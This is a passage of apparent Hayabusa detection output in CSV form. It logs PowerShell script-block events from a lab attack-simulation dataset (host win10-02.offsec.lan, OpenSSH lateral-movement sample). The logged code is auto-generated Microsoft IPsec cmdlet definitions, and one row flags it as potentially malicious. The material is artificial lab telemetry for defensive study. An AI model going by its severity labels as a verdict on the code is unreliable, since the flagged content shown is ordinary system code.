[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 